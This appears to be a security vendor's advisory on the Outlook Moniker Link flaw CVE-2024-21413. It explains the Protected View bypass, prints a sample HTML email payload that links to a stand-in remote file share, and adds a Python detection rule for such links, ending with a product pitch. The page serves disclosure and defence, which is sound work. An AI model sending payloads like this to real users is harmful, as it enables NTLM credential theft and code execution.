
Microsoft Outlook Remote Code Execution (CVE-2024-21413)



Application Details

Microsoft Outlook is an application that's used mainly to send and receive emails. It's also used to manage various types of personal data including calendar appointments and similar entries, tasks, contacts, and notes.


Vulnerability

Microsoft Outlook could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper neutralization of user-supplied input by the Preview Pane feature.


Identification

An attacker could exploit this vulnerability to bypass the Protected View Protocol, obtain local NTLM credentials, and execute arbitrary code with elevated privileges on the system. By modifying a hyperlink with the "!" character and additional text in the Moniker Link, the attacker is able to bypass Outlook's Protected View. This allows the attacker's remote resource to be accessed without triggering any warnings.


An example payload sent as an email:

<html>
<body>
<h1><a href=\"file:///\\10.10.10.10!meeting\">Meeting - click here.</a></h1>
</body>
</html>

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
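
One way to express such a matching rule on the mail-filtering side, as an added example (not Idappcom's signature and not code from the original page): it extracts link targets from an HTML email body and flags any file: URL whose target is followed by "!" and additional text. The function names and the sample bodies are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote


class _LinkCollector(HTMLParser):
    """Collects href/src attribute values from every tag in an HTML body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value)


def is_moniker_link(url):
    """True for a file: URL whose target is followed by '!' and extra text."""
    # Decode %21 and drop stray escape/quote characters left around the value.
    u = unquote(url).strip().strip("\\\"'").lower()
    if not u.startswith("file:"):
        return False
    target = u[len("file:"):].lstrip("/\\")
    head, bang, tail = target.partition("!")
    # All three parts must be present: a target, the '!', and trailing text.
    return bool(head and bang and tail)


def find_moniker_links(html_body):
    """Return every link in the body that matches the Moniker Link pattern."""
    parser = _LinkCollector()
    parser.feed(html_body)
    parser.close()
    return [link for link in parser.links if is_moniker_link(link)]


# Constructed sample bodies (192.0.2.10 is a documentation address).
SAMPLE_SUSPICIOUS = r'<html><body><a href="file:///\\192.0.2.10!meeting">Meeting</a></body></html>'
SAMPLE_BENIGN = ('<html><body><a href="file:///C:/docs/report.docx">Report</a>'
                 '<a href="https://example.com/a!b">Site</a></body></html>')

if __name__ == "__main__":
    for label, body in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, find_moniker_links(body))
```
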


Coverage

Idappcom have created signature 8024675 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
